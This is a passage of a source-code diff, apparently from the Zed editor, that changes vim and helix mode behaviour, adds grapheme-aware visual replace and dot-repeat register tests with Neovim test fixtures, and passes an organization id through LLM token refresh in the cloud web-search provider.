2d0ec4f69a0aaa93b191933565b9db27d8fb3198..961729e0e24a66a624e30ca7c72bfe5f13e10bca 100644 --- a/crates/vim/src/test.rs +++ b/crates/vim/src/test.rs @@ -2117,7 +2117,12 @@ async fn test_folded_multibuffer_excerpts(cx: &mut gpui::TestAppContext) { ); let mut editor = Editor::new(EditorMode::full(), multi_buffer.clone(), None, window, cx); - let buffer_ids = multi_buffer.read(cx).excerpt_buffer_ids(); + let buffer_ids = multi_buffer + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); // fold all but the second buffer, so that we test navigating between two // adjacent folded buffers, as well as folded buffers at the start and // end the multibuffer @@ -2262,7 +2267,13 @@ async fn test_folded_multibuffer_excerpts(cx: &mut gpui::TestAppContext) { " }); cx.update_editor(|editor, _, cx| { - let buffer_ids = editor.buffer().read(cx).excerpt_buffer_ids(); + let buffer_ids = editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); editor.fold_buffer(buffer_ids[1], cx); }); diff --git a/crates/vim/src/test/vim_test_context.rs b/crates/vim/src/test/vim_test_context.rs index 2d5ed4227dcc263f56cfa0bcb337f5673df8ef3c..6f15450aa3f70593c6877c293fecb765978e065d 100644 --- a/crates/vim/src/test/vim_test_context.rs +++ b/crates/vim/src/test/vim_test_context.rs @@ -27,9 +27,10 @@ impl VimTestContext { git_ui::init(cx); crate::init(cx); search::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); settings_ui::init(cx); markdown_preview::init(cx); + zed_actions::init(); }); } @@ -108,12 +109,12 @@ impl VimTestContext { } cx.bind_keys(default_key_bindings); if enabled { - let vim_key_bindings = settings::KeymapFile::load_asset( - "keymaps/vim.json", - Some(settings::KeybindSource::Vim), - cx, - ) - .unwrap(); + let mut vim_key_bindings = + settings::KeymapFile::load_asset_allow_partial_failure("keymaps/vim.json", cx) + .unwrap(); + for key_binding in &mut vim_key_bindings { + key_binding.set_meta(settings::KeybindSource::Vim.meta()); + } cx.bind_keys(vim_key_bindings); } } diff --git a/crates/vim/src/vim.rs b/crates/vim/src/vim.rs index edbbca1c30fb1bda0bedc35d0de6666228b9ef5d..a66111cae1576744c4c51d717984d67c12fc8235 100644 --- a/crates/vim/src/vim.rs +++ b/crates/vim/src/vim.rs @@ -51,7 +51,7 @@ pub use settings::{ use state::{Mode, Operator, RecordedSelection, SearchState, VimGlobals}; use std::{mem, ops::Range, sync::Arc}; use surrounds::SurroundsType; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, SharedString, px}; use vim_mode_setting::HelixModeSetting; use vim_mode_setting::VimModeSetting; @@ -432,8 +432,12 @@ pub fn init(cx: &mut App) { .and_then(|item| item.act_as::(cx)) .and_then(|editor| editor.read(cx).addon::().cloned()); let Some(vim) = vim else { return }; - vim.entity.update(cx, |_, cx| { - cx.defer_in(window, |vim, window, cx| vim.search_submit(window, cx)) + vim.entity.update(cx, |vim, cx| { + if !vim.search.cmd_f_search { + cx.defer_in(window, |vim, window, cx| vim.search_submit(window, cx)) + } else { + cx.propagate() + } }) }); workspace.register_action(|_, _: &GoToTab, window, cx| { @@ -449,7 +453,10 @@ pub fn init(cx: &mut App) { ); } else { // If no count is provided, go to the next tab. - window.dispatch_action(workspace::pane::ActivateNextItem.boxed_clone(), cx); + window.dispatch_action( + workspace::pane::ActivateNextItem::default().boxed_clone(), + cx, + ); } }); @@ -473,7 +480,10 @@ pub fn init(cx: &mut App) { } } else { // No count provided, go to the previous tab. - window.dispatch_action(workspace::pane::ActivatePreviousItem.boxed_clone(), cx); + window.dispatch_action( + workspace::pane::ActivatePreviousItem::default().boxed_clone(), + cx, + ); } }); }) @@ -601,9 +611,11 @@ impl Vim { } let mut was_enabled = Vim::enabled(cx); + let mut was_helix_enabled = HelixModeSetting::get_global(cx).0; let mut was_toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; cx.observe_global_in::(window, move |editor, window, cx| { let enabled = Vim::enabled(cx); + let helix_enabled = HelixModeSetting::get_global(cx).0; let toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; if enabled && was_enabled && (toggle != was_toggle) { if toggle { @@ -615,15 +627,20 @@ impl Vim { editor.set_relative_line_number(None, cx) } } - was_toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; - if was_enabled == enabled { + let helix_changed = was_helix_enabled != helix_enabled; + was_toggle = toggle; + was_helix_enabled = helix_enabled; + + let state_changed = (was_enabled != enabled) || (was_enabled && helix_changed); + if !state_changed { return; } + if was_enabled { + Self::deactivate(editor, cx); + } was_enabled = enabled; if enabled { - Self::activate(editor, window, cx) - } else { - Self::deactivate(editor, cx) + Self::activate(editor, window, cx); } }) .detach(); @@ -635,7 +652,7 @@ impl Vim { fn activate(editor: &mut Editor, window: &mut Window, cx: &mut Context) { let vim = Vim::new(window, cx); let state = vim.update(cx, |vim, cx| { - if !editor.mode().is_full() { + if !editor.use_modal_editing() { vim.mode = Mode::Insert; } @@ -978,6 +995,7 @@ impl Vim { editor.set_clip_at_line_ends(false, cx); editor.set_collapse_matches(false); editor.set_input_enabled(true); + editor.set_expects_character_input(true); editor.set_autoindent(true); editor.selections.set_line_mode(false); editor.unregister_addon::(); @@ -995,7 +1013,14 @@ impl Vim { cx: &mut Context, f: impl Fn(&mut Vim, &A, &mut Window, &mut Context) + 'static, ) { - let subscription = editor.register_action(cx.listener(f)); + let subscription = editor.register_action(cx.listener(move |vim, action, window, cx| { + if !Vim::globals(cx).dot_replaying { + if vim.status_label.take().is_some() { + cx.notify(); + } + } + f(vim, action, window, cx); + })); cx.on_release(|_, _| drop(subscription)).detach(); } @@ -1154,7 +1179,6 @@ impl Vim { let last_mode = self.mode; let prior_mode = self.last_mode; let prior_tx = self.current_tx; - self.status_label.take(); self.last_mode = last_mode; self.mode = mode; self.operator_stack.clear(); @@ -1196,7 +1220,7 @@ impl Vim { return; } - if !mode.is_visual() && last_mode.is_visual() { + if !mode.is_visual() && last_mode.is_visual() && !last_mode.is_helix() { self.create_visual_marks(last_mode, window, cx); } @@ -1263,7 +1287,7 @@ impl Vim { } s.move_with(&mut |map, selection| { - if last_mode.is_visual() && !mode.is_visual() { + if last_mode.is_visual() && !last_mode.is_helix() && !mode.is_visual() { let mut point = selection.head(); if !selection.reversed && !selection.is_empty() { point = movement::left(map, selection.head()); @@ -1346,6 +1370,15 @@ impl Vim { } } + fn expects_character_input(&self) -> bool { + if let Some(operator) = self.operator_stack.last() { + if operator.is_waiting(self.mode) { + return true; + } + } + self.editor_input_enabled() + } + pub fn editor_input_enabled(&self) -> bool { match self.mode { Mode::Insert => { @@ -1576,6 +1609,7 @@ impl Vim { globals.dot_recording = true; globals.recording_actions = Default::default(); globals.recording_count = None; + globals.recording_register_for_dot = self.selected_register; let selections = self.editor().map(|editor| { editor.update(cx, |editor, cx| { @@ -2056,10 +2090,11 @@ impl Vim { VimEditorSettingsState { cursor_shape: self.cursor_shape(cx), clip_at_line_ends: self.clip_at_line_ends(), - collapse_matches: !HelixModeSetting::get_global(cx).0, + collapse_matches: !HelixModeSetting::get_global(cx).0 && !self.search.cmd_f_search, input_enabled: self.editor_input_enabled(), + expects_character_input: self.expects_character_input(), autoindent: self.should_autoindent(), - cursor_offset_on_selection: self.mode.is_visual(), + cursor_offset_on_selection: self.mode.is_visual() || self.mode.is_helix(), line_mode: matches!(self.mode, Mode::VisualLine), hide_edit_predictions: !matches!(self.mode, Mode::Insert | Mode::Replace), } @@ -2075,11 +2110,17 @@ impl Vim { editor.set_clip_at_line_ends(state.clip_at_line_ends, cx); editor.set_collapse_matches(state.collapse_matches); editor.set_input_enabled(state.input_enabled); + editor.set_expects_character_input(state.expects_character_input); editor.set_autoindent(state.autoindent); editor.set_cursor_offset_on_selection(state.cursor_offset_on_selection); editor.selections.set_line_mode(state.line_mode); editor.set_edit_predictions_hidden_for_vim_mode(state.hide_edit_predictions, window, cx); } + + fn set_status_label(&mut self, label: impl Into, cx: &mut Context) { + self.status_label = Some(label.into()); + cx.notify(); + } } struct VimEditorSettingsState { @@ -2087,6 +2128,7 @@ struct VimEditorSettingsState { clip_at_line_ends: bool, collapse_matches: bool, input_enabled: bool, + expects_character_input: bool, autoindent: bool, cursor_offset_on_selection: bool, line_mode: bool, @@ -2099,6 +2141,7 @@ struct VimSettings { pub toggle_relative_line_numbers: bool, pub use_system_clipboard: settings::UseSystemClipboard, pub use_smartcase_find: bool, + pub use_regex_search: bool, pub gdefault: bool, pub custom_digraphs: HashMap>, pub highlight_on_yank_duration: u64, @@ -2185,6 +2228,7 @@ impl Settings for VimSettings { toggle_relative_line_numbers: vim.toggle_relative_line_numbers.unwrap(), use_system_clipboard: vim.use_system_clipboard.unwrap(), use_smartcase_find: vim.use_smartcase_find.unwrap(), + use_regex_search: vim.use_regex_search.unwrap(), gdefault: vim.gdefault.unwrap(), custom_digraphs: vim.custom_digraphs.unwrap(), highlight_on_yank_duration: vim.highlight_on_yank_duration.unwrap(), diff --git a/crates/vim/src/visual.rs b/crates/vim/src/visual.rs index 889e3468f2ef6eaa290b6e0aec1971cd2e9ad813..bc53167b158d26717b1aa629b764a78dfe4c0ddc 100644 --- a/crates/vim/src/visual.rs +++ b/crates/vim/src/visual.rs @@ -788,7 +788,10 @@ impl Vim { { let range = row_range.start.to_offset(&display_map, Bias::Right) ..row_range.end.to_offset(&display_map, Bias::Right); - let text = text.repeat(range.end - range.start); + let grapheme_count = display_map + .buffer_snapshot() + .grapheme_count_for_range(&range); + let text = text.repeat(grapheme_count); edits.push((range, text)); } } @@ -1561,6 +1564,38 @@ mod test { }); } + #[gpui::test] + async fn test_visual_block_insert_after_ctrl_d_scroll(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + let shared_state_lines = (1..=10) + .map(|line_number| format!("{line_number:02}")) + .collect::>() + .join("\n"); + let shared_state = format!("ˇ{shared_state_lines}\n"); + + cx.set_scroll_height(5).await; + cx.set_shared_state(&shared_state).await; + + cx.simulate_shared_keystrokes("ctrl-v ctrl-d").await; + cx.shared_state().await.assert_matches(); + + cx.simulate_shared_keystrokes("shift-i x escape").await; + cx.shared_state().await.assert_eq(indoc! { + " + ˇx01 + x02 + x03 + x04 + x05 + 06 + 07 + 08 + 09 + 10 + " + }); + } + #[gpui::test] async fn test_visual_block_wrapping_selection(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; @@ -1985,4 +2020,21 @@ mod test { // would depend on the key bindings configured, but the actions // are now available for use } + + #[gpui::test] + async fn test_visual_replace_uses_graphemes(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.set_state("«Hällöˇ» Wörld", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ11111 Wörld", Mode::Normal); + + cx.set_state("«e\u{301}ˇ»", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ1", Mode::Normal); + + cx.set_state("«🙂ˇ»", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ1", Mode::Normal); + } } diff --git a/crates/vim/test_data/test_dot_repeat_registers.json b/crates/vim/test_data/test_dot_repeat_registers.json new file mode 100644 index 0000000000000000000000000000000000000000..76ca1af20fe14cacb23482cd6988dea16cfb9194 --- /dev/null +++ b/crates/vim/test_data/test_dot_repeat_registers.json @@ -0,0 +1,125 @@ +{"Put":{"state":"ˇhello\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"p"} +{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}} +{"Key":"."} +{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}} +{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"_"} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"p"} +{"Get":{"state":"tocopytext\n3\nˇtocopytext\n","mode":"Normal"}} +{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"tocopytext\n1\n2\n3\nˇ1\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"d"} +{"Key":"d"} +{"Key":"\""} +{"Key":"b"} +{"Key":"."} +{"Get":{"state":"ˇthree\n","mode":"Normal"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"\""} +{"Key":"b"} +{"Key":"p"} +{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇline one\nline two\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"b"} +{"Key":"."} +{"Get":{"state":"line one\nline two\nline one\nline one\nˇline one\n","mode":"Normal"}} +{"Put":{"state":"ˇ1\n2\n3\n4\n5\n6\n7\n8\n9\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"ˇ","mode":"Normal"}} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"\n9\n8\n7\n6\n5\n4\n3\n2\n1\nˇ1","mode":"Normal"}} +{"Put":{"state":"ˇa\nb\nc\n"}} +{"Key":"\""} +{"Key":"9"} +{"Key":"y"} +{"Key":"y"} +{"Key":"\""} +{"Key":"9"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"a\na\na\nˇa\nb\nc\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"one\ntwo\n9\none\nˇone\ntwo\nthree\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_dot_repeat_registers_paste.json b/crates/vim/test_data/test_dot_repeat_registers_paste.json new file mode 100644 index 0000000000000000000000000000000000000000..f5a08d432d0b1fda8ec1bfe71d7401ec8769d8d2 --- /dev/null +++ b/crates/vim/test_data/test_dot_repeat_registers_paste.json @@ -0,0 +1,105 @@ +{"Put":{"state":"ˇhello\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"p"} +{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}} +{"Key":"."} +{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\nfour\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"_"} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"p"} +{"Get":{"state":"one\nfour\nˇone\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"one\ntwo\ntwo\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"d"} +{"Key":"d"} +{"Key":"\""} +{"Key":"b"} +{"Key":"."} +{"Get":{"state":"ˇthree\n","mode":"Normal"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"\""} +{"Key":"b"} +{"Key":"p"} +{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\nfour\nfive\nsix\nseven\neight\nnine\nten\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"ˇ","mode":"Normal"}} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"\nten\nnine\neight\nseven\nsix\nfive\nfour\nthree\ntwo\nˇtwo","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}} +{"Put":{"state":"one\ntwo\nˇthree\n"}} +{"Key":"\""} +{"Key":"2"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"k"} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"one\ntwo\nthree\none\nˇone\ntwo\nthree\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_matching_comments.json b/crates/vim/test_data/test_matching_comments.json new file mode 100644 index 0000000000000000000000000000000000000000..7fcf5e46e1ea16f2be794ff76b583242b33aabc0 --- /dev/null +++ b/crates/vim/test_data/test_matching_comments.json @@ -0,0 +1,10 @@ +{"Put":{"state":"ˇ/*\n this is a comment\n*/"}} +{"Key":"%"} +{"Get":{"state":"/*\n this is a comment\nˇ*/","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"ˇ/*\n this is a comment\n*/","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"/*\n this is a comment\nˇ*/","mode":"Normal"}} +{"Put":{"state":"ˇ// comment"}} +{"Key":"%"} +{"Get":{"state":"ˇ// comment","mode":"Normal"}} diff --git a/crates/vim/test_data/test_matching_preprocessor_directives.json b/crates/vim/test_data/test_matching_preprocessor_directives.json new file mode 100644 index 0000000000000000000000000000000000000000..9f0bd9792ee8dad5029f4ecaf325c231755530e1 --- /dev/null +++ b/crates/vim/test_data/test_matching_preprocessor_directives.json @@ -0,0 +1,18 @@ +{"Put":{"state":"#ˇif\n\n#else\n\n#endif\n"}} +{"Key":"%"} +{"Get":{"state":"#if\n\nˇ#else\n\n#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"#if\n\n#else\n\nˇ#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"ˇ#if\n\n#else\n\n#endif\n","mode":"Normal"}} +{"Put":{"state":"#ˇif\n #if\n\n #else\n\n #endif\n\n#else\n#endif\n"}} +{"Key":"%"} +{"Get":{"state":"#if\n #if\n\n #else\n\n #endif\n\nˇ#else\n#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Key":"%"} +{"Get":{"state":"ˇ#if\n #if\n\n #else\n\n #endif\n\n#else\n#endif\n","mode":"Normal"}} +{"Key":"j"} +{"Key":"%"} +{"Key":"%"} +{"Key":"%"} +{"Get":{"state":"#if\n ˇ#if\n\n #else\n\n #endif\n\n#else\n#endif\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json b/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json new file mode 100644 index 0000000000000000000000000000000000000000..ddad34e9ad6b11d5f29670f46903e6daf4082215 --- /dev/null +++ b/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json @@ -0,0 +1,10 @@ +{"SetOption":{"value":"scrolloff=3"}} +{"SetOption":{"value":"lines=7"}} +{"Put":{"state":"ˇ01\n02\n03\n04\n05\n06\n07\n08\n09\n10\n"}} +{"Key":"ctrl-v"} +{"Key":"ctrl-d"} +{"Get":{"state":"«0ˇ»1\n«0ˇ»2\n«0ˇ»3\n«0ˇ»4\n«0ˇ»5\n06\n07\n08\n09\n10\n","mode":"VisualBlock"}} +{"Key":"shift-i"} +{"Key":"x"} +{"Key":"escape"} +{"Get":{"state":"ˇx01\nx02\nx03\nx04\nx05\n06\n07\n08\n09\n10\n","mode":"Normal"}} diff --git a/crates/vim_mode_setting/Cargo.toml b/crates/vim_mode_setting/Cargo.toml index 0ae75d9d55136a499492893afdf14398073c6df3..6306d125b27a5342a61f503520692c099ab9c4f6 100644 --- a/crates/vim_mode_setting/Cargo.toml +++ b/crates/vim_mode_setting/Cargo.toml @@ -12,4 +12,5 @@ workspace = true path = "src/vim_mode_setting.rs" [dependencies] +gpui.workspace = true settings.workspace = true diff --git a/crates/vim_mode_setting/src/vim_mode_setting.rs b/crates/vim_mode_setting/src/vim_mode_setting.rs index e229913a80b0bedcd4ef7b872f1559b98c803d0c..cb9ab03785c9e00459733c62f1b524cea422bfa1 100644 --- a/crates/vim_mode_setting/src/vim_mode_setting.rs +++ b/crates/vim_mode_setting/src/vim_mode_setting.rs @@ -4,6 +4,7 @@ //! disable Vim/Helix modes without having to depend on the `vim` crate in its //! entirety. +use gpui::App; use settings::{RegisterSetting, Settings, SettingsContent}; #[derive(RegisterSetting)] @@ -15,9 +16,25 @@ impl Settings for VimModeSetting { } } +impl VimModeSetting { + pub fn is_enabled(cx: &App) -> bool { + Self::try_get(cx) + .map(|vim_mode| vim_mode.0) + .unwrap_or(false) + } +} + #[derive(RegisterSetting)] pub struct HelixModeSetting(pub bool); +impl HelixModeSetting { + pub fn is_enabled(cx: &App) -> bool { + Self::try_get(cx) + .map(|helix_mode| helix_mode.0) + .unwrap_or(false) + } +} + impl Settings for HelixModeSetting { fn from_settings(content: &SettingsContent) -> Self { Self(content.helix_mode.unwrap()) diff --git a/crates/watch/Cargo.toml b/crates/watch/Cargo.toml index 9d77eaeddec66a08dd2e9d5056249671c9b02670..aea8b0bbbda7d53d17400553407eceb7cb8253b2 100644 --- a/crates/watch/Cargo.toml +++ b/crates/watch/Cargo.toml @@ -19,5 +19,4 @@ parking_lot.workspace = true ctor.workspace = true futures.workspace = true gpui = { workspace = true, features = ["test-support"] } -rand.workspace = true zlog.workspace = true diff --git a/crates/web_search_providers/Cargo.toml b/crates/web_search_providers/Cargo.toml index ecdca5883ff541459e94170986df3b7f16036c5a..ff264edcb150063237c633de746b2f6b9f6f250c 100644 --- a/crates/web_search_providers/Cargo.toml +++ b/crates/web_search_providers/Cargo.toml @@ -14,6 +14,7 @@ path = "src/web_search_providers.rs" [dependencies] anyhow.workspace = true client.workspace = true +cloud_api_types.workspace = true cloud_llm_client.workspace = true futures.workspace = true gpui.workspace = true diff --git a/crates/web_search_providers/src/cloud.rs b/crates/web_search_providers/src/cloud.rs index 2f3ccdbb52a884471250ad458e8b7922437cb9ae..11227d8fb5c7152dc5b7e03b95fadea6cb714717 100644 --- a/crates/web_search_providers/src/cloud.rs +++ b/crates/web_search_providers/src/cloud.rs @@ -1,12 +1,13 @@ use std::sync::Arc; use anyhow::{Context as _, Result}; -use client::Client; +use client::{Client, NeedsLlmTokenRefresh, UserStore, global_llm_token}; +use cloud_api_types::OrganizationId; use cloud_llm_client::{WebSearchBody, WebSearchResponse}; use futures::AsyncReadExt as _; -use gpui::{App, AppContext, Context, Entity, Subscription, Task}; +use gpui::{App, AppContext, Context, Entity, Task}; use http_client::{HttpClient, Method}; -use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener}; +use language_model::LlmApiToken; use web_search::{WebSearchProvider, WebSearchProviderId}; pub struct CloudWebSearchProvider { @@ -14,8 +15,8 @@ pub struct CloudWebSearchProvider { } impl CloudWebSearchProvider { - pub fn new(client: Arc, cx: &mut App) -> Self { - let state = cx.new(|cx| State::new(client, cx)); + pub fn new(client: Arc, user_store: Entity, cx: &mut App) -> Self { + let state = cx.new(|cx| State::new(client, user_store, cx)); Self { state } } @@ -23,29 +24,18 @@ impl CloudWebSearchProvider { pub struct State { client: Arc, + user_store: Entity, llm_api_token: LlmApiToken, - _llm_token_subscription: Subscription, } impl State { - pub fn new(client: Arc, cx: &mut Context) -> Self { - let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx); + pub fn new(client: Arc, user_store: Entity, cx: &mut Context) -> Self { + let llm_api_token = global_llm_token(cx); Self { client, - llm_api_token: LlmApiToken::default(), - _llm_token_subscription: cx.subscribe( - &refresh_llm_token_listener, - |this, _, _event, cx| { - let client = this.client.clone(); - let llm_api_token = this.llm_api_token.clone(); - cx.spawn(async move |_this, _cx| { - llm_api_token.refresh(&client).await?; - anyhow::Ok(()) - }) - .detach_and_log_err(cx); - }, - ), + user_store, + llm_api_token, } } } @@ -61,21 +51,31 @@ impl WebSearchProvider for CloudWebSearchProvider { let state = self.state.read(cx); let client = state.client.clone(); let llm_api_token = state.llm_api_token.clone(); + let organization_id = state + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); let body = WebSearchBody { query }; - cx.background_spawn(async move { perform_web_search(client, llm_api_token, body).await }) + cx.background_spawn(async move { + perform_web_search(client, llm_api_token, organization_id, body).await + }) } } async fn perform_web_search( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, body: WebSearchBody, ) -> Result { const MAX_RETRIES: usize = 3; let http_client = &client.http_client(); let mut retries_remaining = MAX_RETRIES; - let mut token = llm_api_token.acquire(&client).await?; + let mut token = client + .acquire_llm_token(&llm_api_token, organization_id.clone()) + .await?; loop { if retries_remaining == 0 { @@ -100,7 +100,9 @@ async fn perform_web_search( response.body_mut().read_to_string(&mut body).await?; return Ok(serde_json::from_str(&body)?); } else if response.needs_llm_token_refresh() { - token = llm_api_token.refresh(&client).await?; + token = client + .refresh_llm_token(&llm_api_token, organization_id.clone()) + .await?; retries_remaining -= 1; } else { // For now we will only retry if the LLM token is expired, diff --git a/crates/web_search_providers/src/web_search_providers.rs b/crates/web_search_providers/src/web_search_providers.rs index 8ab0aee47a414c4cc669ab05e727a827d17c2844..509632429fb167cd489cd4253ceae0ce479b10a8 100644 --- a/crates/web_search_providers/src/web_search_providers.rs +++ b/crates/web_search_providers/src/web_search_providers.rs @@ -1,26 +1,28 @@ mod cloud; -use client::Client; +use client::{Client, UserStore}; use gpui::{App, Context, Entity}; use language_model::LanguageModelRegistry; use std::sync::Arc; use web_search::{WebSearchProviderId, WebSearchRegistry}; -pub fn init(client: Arc, cx: &mut App) { +pub fn init(client: Arc, user_store: Entity, cx: &mut App) { let registry = WebSearchRegistry::global(cx); registry.update(cx, |registry, cx| { - register_web_search_providers(registry, client, cx); + register_web_search_providers(registry, client, user_store, cx); }); } fn register_web_search_providers( registry: &mut WebSearchRegistry, client: Arc, + user_store: Entity, cx: &mut Context, ) { register_zed_web_search_provider( registry, client.clone(), + user_store.clone(), &LanguageModelRegistry::global(cx), cx, ); @@ -29,7 +31,13 @@ fn register_web_search_providers( &LanguageModelRegistry::global(cx), move |this, registry, event, cx| { if let language_model::Event::DefaultModelChanged = event { - register_zed_web_search_provider(this, client.clone(), ®istry, cx) + register_zed_web_search_provider( + this, + client.clone(), + user_store.clone(), + ®istry, + cx, + ) } }, ) @@ -39,6 +47,7 @@ fn register_web_search_providers( fn register_zed_web_search_provider( registry: &mut WebSearchRegistry, client: Arc, + user_store: Entity, language_model_registry: &Entity, cx: &mut Context, ) { @@ -47,7 +56,10 @@ fn register_zed_web_search_provider( .default_model() .is_some_and(|default| default.is_provided_by_zed()); if using_zed_provider { - registry.register_provider(cloud::CloudWebSearchProvider::new(client, cx), cx) + registry.register_provider( + cloud::CloudWebSearchProvider::new(client, user_store, cx), + cx, + ) } else { registry.unregister_provider(WebSearchProviderId( cloud::ZED_WEB_SEARCH_PROVIDER_ID.into(), diff --git a/crates/which_key/Cargo.toml b/crates/which_key/Cargo.toml index f53ba45dd71abc972ce23efb8871f485dfe47207..cafcc2306b89d805f3e02b70060e4bb23b3436ff 100644 --- a/crates/which_key/Cargo.toml +++ b/crates/which_key/Cargo.toml @@ -17,7 +17,7 @@ command_palette.workspace = true gpui.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/which_key/src/which_key.rs b/crates/which_key/src/which_key.rs index 70889c100f33020a3ceaa8af1ba8812d5e7d4adb..d71bd646e70a4ede6047bd88416ea9314bddf12d 100644 --- a/crates/which_key/src/which_key.rs +++ b/crates/which_key/src/which_key.rs @@ -61,12 +61,8 @@ pub fn init(cx: &mut App) { pub static FILTERED_KEYSTROKES: LazyLock>> = LazyLock::new(|| { [ // Modifiers on normal vim commands - "g h", "g j", "g k", - "g l", - "g $", - "g ^", // Duplicate keys with "ctrl" held, e.g. "ctrl-w 